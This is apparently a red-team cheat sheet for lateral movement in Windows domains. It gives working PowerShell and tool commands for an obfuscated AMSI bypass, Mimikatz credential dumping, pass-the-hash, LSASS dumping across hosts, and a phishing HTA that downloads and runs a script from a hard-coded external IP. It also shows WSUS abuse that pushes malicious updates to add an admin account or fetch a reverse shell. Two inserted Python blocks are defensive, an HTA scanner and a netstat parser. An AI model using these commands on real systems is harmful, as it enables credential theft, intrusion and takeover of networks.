# Lateral Movement

## PSRemoting

#### PSRemoting Session

```
New-PSSession -ComputerName Target1
Enter-PSSession -ComputerName Target1

# Add TrustedHosts so you can PSRemote to an IP rather than a hostname ("*" trusts every host)
winrm set winrm/config/client '@{TrustedHosts="*"}'

# Connect with local admin creds
enter-pssession 192.168.144.100 -Authentication Negotiate -Credential $cred
```

### Pass Creds

```
# If you have RDP access and can get a prompt
$cred = Get-Credential Domain\Username
invoke-command -Credential $cred -computername x -scriptblock {whoami}

# If you are over C2 and can't get a prompt
$password = "Password123" | ConvertTo-SecureString -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("Domain\User", $password)
Invoke-Command -ComputerName 192.168.144.197 -Credential $cred -ScriptBlock {whoami}
```

#### PSRemoting Invoke-Command

```
# Execute commands or script blocks:
Invoke-Command -ScriptBlock {Get-Process} -ComputerName (Get-Content <list_of_servers>)

# Execute scripts from files:
Invoke-Command -FilePath C:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content <list_of_servers>)

# Execute a locally loaded function on the remote machines:
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content <list_of_servers>)

# Pass arguments:
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content <list_of_servers>) -ArgumentList <args>

# If the script file defines the function and calls it itself:
Invoke-Command -FilePath C:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content <list_of_servers>)

# Execute stateful commands (variables persist across calls in the same session):
$Sess = New-PSSession -ComputerName Server1
Invoke-Command -Session $Sess -ScriptBlock {$Proc = Get-Process}
Invoke-Command -Session $Sess -ScriptBlock {$Proc.Name}
```

#### Stateful Mimikatz

```
$sess = New-PSSession -ComputerName server1
# Obfuscated AMSI bypass, run in the remote session before loading the script
Invoke-Command -session $sess -scriptblock {sET-ItEM ( 'V'+'aR' +  'IA' + 'blE:1q2'  + 'uZx'  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    GeT-VariaBle  ( "1Q2U"  +"zX"  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System'  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f'amsi','d','InitFaile'  ),(  "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )}
# Load Invoke-Mimikatz into the same session, then drop into it interactively
Invoke-Command -Session $sess -FilePath C:\Tools\Invoke-Mimikatz.ps1
Enter-PSSession -Session $sess
```

#### Invoke-Mimikatz

```
# Dump Creds on local machine
Invoke-Mimikatz -DumpCreds

# Dump creds on multiple machines
Invoke-Mimikatz -DumpCreds -ComputerName @("sys1", "sys2")

# "Over pass the hash" generate tokens from hashes
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:DOMAIN.LOCAL /ntlm:<ntlmhash> /run:powershell.exe"'
```

## Double Hop Problem

### PowerShell

```
$cred = Get-Credential DOMAIN\USER

# Execute commands
Invoke-Command -Computername COMP -Credential $cred -Scriptblock {hostname; Invoke-Command -Computername COMP2 -Credential $using:cred -Scriptblock {hostname}}

# Copy files
Invoke-Command -Computername COMP -Credential $cred -Scriptblock {hostname; $sess2 = new-pssession -Computername COMP2 -Credential $using:cred; Copy-item .\procdump64.exe -Destination "C:\Documents\" -ToSession $sess2}

# Dump
Invoke-Command -Computername COMP -Credential $cred -Scriptblock {hostname; Invoke-Command -Computername COMP2 -Credential $using:cred -Scriptblock {hostname; .\procdump64.exe -accepteula -ma lsass.exe lsass.dmp}}

# Copy dump back
Invoke-Command -Computername COMP -Credential $cred -Scriptblock {hostname; $sess2 = new-pssession -Computername COMP2 -Credential $using:cred; Copy-item "C:\Documents\lsass.dmp" -Destination "C:\Documents\" -FromSession $sess2}

# Rubeus can also be used over the double hop: import (ptt) an extracted ticket on COMP2, then interact with a third system
Invoke-Command -Computername COMP -Credential $cred -Scriptblock {hostname; Invoke-Command -Computername COMP2 -Credential $using:cred -Scriptblock {hostname;.\Rubeus.exe ptt /ticket:doI<snip>AYArt ; ls \\COMP3\c$\}}
```

### PsExec / Rubeus

```
# psexec to first host
Psexec.exe -accepteula \\COMP -u USER -p <password> cmd

# Use rubeus on first host to overpass the hash and then access second host.
# NOTE: using the /domain flag makes it unreliable.
Rubeus.exe asktgt /user:USER /rc4:<hash> /ptt
```

### Phish

```
# Generate HTA
<scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -ep bypass -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>

# Send Email
Send-MailMessage -From 'User01 <user01@fabrikam.com>' -To 'User02 <user02@fabrikam.com>' -Subject 'Test mail' -SmtpServer AC-ITSTAFF

# use Nishang to generate powershell phish payloads
```
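From the defender's side, the HTA above relies on mixed-case keywords to slip past naive string matching, so a scanner has to normalise case before looking for the cradle. This Python checker is an added example (not part of the cheat sheet) that scores an HTA body for the VBScript-to-PowerShell download pattern and pulls out the URLs; the sample HTA is constructed with a placeholder host.

```python
"""Score an .hta file for the VBScript -> hidden PowerShell download cradle.

Added example, not from the original cheat sheet. The sample HTA is
constructed with a placeholder host; case is normalised before matching
because the cheat sheet's payload mixes case to dodge simple signatures.
"""
import re

# Constructed sample mirroring the cheat sheet's HTA, with a placeholder host.
SAMPLE_HTA = ('<scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run '
              '"powershell -ep bypass -w hidden IEX (New-ObjEct System.Net.Webclient)'
              '.DownloadString(\'http://ATTACKER_HOST:8080/1.ps1\')"</scRipt>')

# Each pattern is applied to the lower-cased document.
INDICATORS = {
    "vbscript_block": r"<script[^>]*language\s*=\s*\"?vbscript",
    "wscript_shell_run": r"createobject\(\s*\"wscript\.shell\"\s*\)\.run",
    "powershell_hidden_window": r"powershell[^\"]*-w(?:indowstyle)?\s+hidden",
    "execution_policy_bypass": r"-e(?:xecutionpolicy|p)\s+bypass",
    "download_cradle": r"downloadstring\s*\(",
    "iex_invoke_expression": r"\b(?:iex|invoke-expression)\b",
}
URL = re.compile(r"https?://[^\s'\"\)]+")


def analyze_hta(text):
    """Return (matched indicator names, extracted URLs) for an HTA body."""
    norm = text.lower()
    matched = [name for name, pat in INDICATORS.items() if re.search(pat, norm)]
    return matched, URL.findall(text)
```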

## Pass-The-Hash

```
runas /noprofile /netonly /user:<domain\username> powershell.exe

Rubeus.exe asktgt /user:USER /rc4:<hash> /ptt

Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:DOMAIN /ntlm:<ntlmhash> /run:powershell.exe"'
```

## PsExec

## WSUS

#### Enumeration

```
# If you compromise a WSUS server you can push updates to every client it serves

# See which computers are connecting for updates (port 8530 = http, port 8531 = https)
netstat -ano
```
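Reading the netstat output by eye does not scale, so as an added example (not from the cheat sheet) here is a Python parser for Windows `netstat -ano` lines that lists the distinct clients talking to the WSUS ports, which is the same inventory a defender needs to know the blast radius of a compromised WSUS server. The netstat text is constructed to match the Windows output format.

```python
"""List clients talking to a WSUS server, parsed from Windows `netstat -ano` output.

Added example, not part of the original cheat sheet; the netstat text is
constructed to look like Windows output.
"""
import re
from collections import defaultdict

WSUS_PORTS = {8530: "http", 8531: "https"}

# Constructed sample of `netstat -ano` output (Windows column layout).
SAMPLE = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:8530           0.0.0.0:0              LISTENING       4
  TCP    10.0.0.5:8530          10.0.0.21:49812        ESTABLISHED     4
  TCP    10.0.0.5:8530          10.0.0.22:50123        TIME_WAIT       0
  TCP    10.0.0.5:8531          10.0.0.23:51002        ESTABLISHED     4
  TCP    10.0.0.5:3389          10.0.0.9:60000         ESTABLISHED     1234
  TCP    [::]:8531              [::]:0                 LISTENING       4
"""

# proto, local addr, local port, foreign addr, foreign port, state, pid
LINE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\S+)\s+(\d+)\s*$")


def wsus_clients(netstat_text):
    """Return {local_port: sorted distinct client IPs} for the WSUS ports only."""
    clients = defaultdict(set)
    for line in netstat_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # header, blank or UDP line
        local_port, remote_ip, state = int(m.group(2)), m.group(3), m.group(5)
        if local_port in WSUS_PORTS and state != "LISTENING":
            clients[local_port].add(remote_ip)
    return {port: sorted(ips) for port, ips in clients.items()}
```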

#### Abuse

```
https://github.com/AlsidOfficial/WSUSpendu/blob/master/WSUSpendu.ps1

# Put psexec.exe and WSUSpendu.ps1 in the same directory

# Send out malicious update to gain local admin on machine 
Wsuspendu.ps1 -Inject -PayloadFile psexec.exe -PayloadArgs '-accepteula -s -d cmd.exe /c "net user Titi Password123_ /add && net localgroup Administrators Titi /add"' -ComputerName Win7.test.net

# Compromise isolated networks with a reverse shell
# Where Script is an amsi bypass plus a reverse shell connecting over 8531
.\Wsuspendu.ps1 -Inject -PayloadFile .\psexec.exe -PayloadArgs '-accepteula -s -d powershell.exe -c "wget http://IP2:8531/Reverse.ps1 -UseBasicParsing -OutFile .\Reverse.ps1;.\Reverse.ps1"' -ComputerName <targetComp>

# Listen on host and wait 
powercat -l -v -p 8531
```
